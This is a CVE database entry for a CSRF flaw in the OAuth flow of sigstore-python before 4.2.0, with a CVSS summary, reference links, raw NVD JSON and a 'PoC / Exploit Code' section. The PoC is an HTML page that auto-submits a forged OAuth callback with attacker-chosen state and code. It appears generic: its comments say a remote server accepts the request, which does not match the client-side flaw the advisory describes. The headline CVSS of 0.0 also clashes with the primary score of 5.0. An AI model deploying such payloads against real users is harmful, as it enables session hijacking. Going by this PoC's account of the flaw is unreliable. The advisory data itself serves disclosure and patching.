Security Vulnerability Report

CVE-2026-24408

Published: 2026-01-26 23:16:09
Last Modified: 2026-03-02 21:19:26

Description

sigstore-python is a Python tool for generating and verifying Sigstore signatures. Prior to version 4.2.0, the sigstore-python OAuth authentication flow is susceptible to Cross-Site Request Forgery. `_OAuthSession` creates a unique "state" and sends it as a parameter in the authentication request, but the "state" in the server response seems not to be cross-checked against this value. Version 4.2.0 contains a patch for the issue.

CVSS Details

CVSS Score
0.0
Severity
NONE
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:sigstore-python:*:*:*:*:*:*:*:* - VULNERABLE
sigstore-python < 4.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-24408 CSRF PoC for sigstore-python OAuth -->
<!DOCTYPE html>
<html>
<head>
  <title>Sigstore OAuth CSRF PoC</title>
</head>
<body>
  <h2>Sigstore OAuth CSRF Attack PoC</h2>
  <p>This PoC demonstrates the CSRF vulnerability in sigstore-python OAuth flow.</p>
  <script>
    // Malicious OAuth callback parameters
    const fakeState = 'attacker_controlled_state_' + Math.random().toString(36).substring(7);
    const fakeCode = 'attacker_obtained_authorization_code';
    // In real attack, this would point to sigstore-python's OAuth callback endpoint
    // The server accepts this request without validating the 'state' parameter
    const oauthCallbackUrl = 'https://sigstore-service.example.com/oauth/callback';
    // Auto-submit form to trigger OAuth callback with attacker-controlled parameters
    document.write(`
      <form id="csrfForm" action="${oauthCallbackUrl}" method="POST">
        <input type="hidden" name="state" value="${fakeState}" />
        <input type="hidden" name="code" value="${fakeCode}" />
      </form>
    `);
    // Auto-submit on page load
    window.onload = function() {
      document.getElementById('csrfForm').submit();
    };
  </script>
  <noscript>
    <form id="csrfForm" action="https://sigstore-service.example.com/oauth/callback" method="POST">
      <input type="hidden" name="state" value="malicious_state_value" />
      <input type="hidden" name="code" value="malicious_code" />
      <button type="submit">Click to continue</button>
    </form>
  </noscript>
</body>
</html>

References

https://github.com/sigstore/sigstore-python/commit/5e77497fe8f0b202bdd118949074ec2f20da69aa (Patch)
https://github.com/sigstore/sigstore-python/releases/tag/v4.2.0 (Product, Release Notes)
https://github.com/sigstore/sigstore-python/security/advisories/GHSA-hm8f-75xx-w2vr (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24408", "sourceIdentifier": "[email protected]", "published": "2026-01-26T23:16:08.973", "lastModified": "2026-03-02T21:19:25.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "sigstore-python is a Python tool for generating and verifying Sigstore signatures. Prior to version 4.2.0, the sigstore-python OAuth authentication flow is susceptible to Cross-Site Request Forgery. `_OAuthSession` creates a unique \"state\" and sends it as a parameter in the authentication request but the \"state\" in the server response seems not not be cross-checked with this value. Version 4.2.0 contains a patch for the issue."}, {"lang": "es", "value": "sigstore-python es una herramienta de Python para generar y verificar firmas de Sigstore. Antes de la versión 4.2.0, el flujo de autenticación OAuth de sigstore-python es susceptible a la falsificación de petición en sitios cruzados. `_OAuthSession` crea un 'estado' único y lo envía como parámetro en la petición de autenticación, pero el 'estado' en la respuesta del servidor parece no ser verificado con este valor. La versión 4.2.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:N", "baseScore": 0.0, "baseSeverity": "NONE", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 0.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:sigstore-python:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.0", "matchCriteriaId": "7DA3586E-04FD-4D7E-85C8-BAE152F3C9D8"}]}]}], "references": [{"url": "https://github.com/sigstore/sigstore-python/commit/5e77497fe8f0b202bdd118949074ec2f20da69aa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sigstore/sigstore-python/releases/tag/v4.2.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sigstore/sigstore-python/security/advisories/GHSA-hm8f-75xx-w2vr", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}